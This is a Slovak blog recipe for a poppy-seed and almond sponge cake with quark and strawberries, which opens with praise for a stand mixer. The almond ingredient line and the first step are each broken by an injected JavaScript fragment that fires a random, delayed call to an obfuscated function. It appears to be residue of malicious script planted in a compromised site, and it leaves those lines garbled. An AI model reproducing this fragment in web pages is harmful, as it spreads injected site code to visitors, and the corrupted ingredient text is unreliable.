Makovo-mandľová bublanina s jahodami

Tento recept milujem..je tak jednoduchý, že ho zvládne skutočne každý! Aj preto, lebo všetko iba šupnete do stroja, otočíte kolieskom na požadovanú rýchlosť a nech sa to „samo“ miesi. Často sa ma pýtate, akého robota používam na miesenie cesta. Skúšala som už rôzne, ale mám pocit, že asi zakotvím pri Electroluxe. Keď ho zapnete, tak vám to krásne osvieti celú misu zvnútra. Človek by si povedal, že načo si svietiť na cesto, ale vám poviem, že je to na nezaplatenie. Vždy som si dnu svietila mobilom, aby som videla, či už je cesto dobre vymiesené, či už tam nie sú hrudky múky a podobne. Okrem toho má metličku, ktorá má po okrajoch gumenú stierku a teda sa vám nestane, že budete mať po okrajoch a na dne nádoby nerozmiešané cesto. Tak poďme už na ten recept, lebo na vás vidím, že už sa neviete dočkať. 😀

Ingrediencie

  • ½ hrnčeka mletého maku
  • 8 pl trstinového cukru
  • 100 g mletých mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlí
  • 50 g celozrnnej ražnej múky
  • 60 g špaldovej hladkej múky
  • 1 čl sódy bikarbóny
  • 100 g ghee masla (alebo roztopeného masla)
  • 200 ml mlieka
  • 3 vajcia
  • 1 kl vanilky

Na posypanie

  • 1 hrudkový plnotučný tvaroh
  • 2 pl trstinového cukru
  • jahody čerstvé alebo mrazené

 

Postup

  1. Všetky navážené suroviny len vložíme do robota a necháme miesiť do hladka. Odporúčam pri mletí maku prisypať do elektrického mlynčeka aj cukor, aby sa vám nelepil. Rovnako postupujte aj pri mletí mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľových lupienkov.

    OLYMPUS DIGITAL CAMERA
    Bez roboty s robotom 🙂
  2. Vymiesené cesto vylejeme do menšieho pekáčika vystlaného papierom na pečenie. Posypeme tvarohom, ktorý sme rozrobili s 2 pl trstinového cukru a poukladáme jahody, alebo ľubovoľné ovocie.

    OLYMPUS DIGITAL CAMERA
    Tvaroh náš každodenný
  3. Dáme do rúry vyhriatej na 200 stupňov, teplotu znížime na 180 stupňov a pomaly pečieme asi 45 minút. Môžete piecť aj pri vyššej teplote kratšie, alebo podľa toho, akú máte rúru, veď bublaninu vieme piecť všetci 😀 Len tu nám ten tvaroh a jahody udržujú vlhkosť, preto treba piecť trošku dlhšie 😀

    OLYMPUS DIGITAL CAMERA
    Jahôdky zo záhradky 🙂

Ohodnoť Recept

Napíš Koment

Vaša e-mailová adresa nebude zverejnená.

*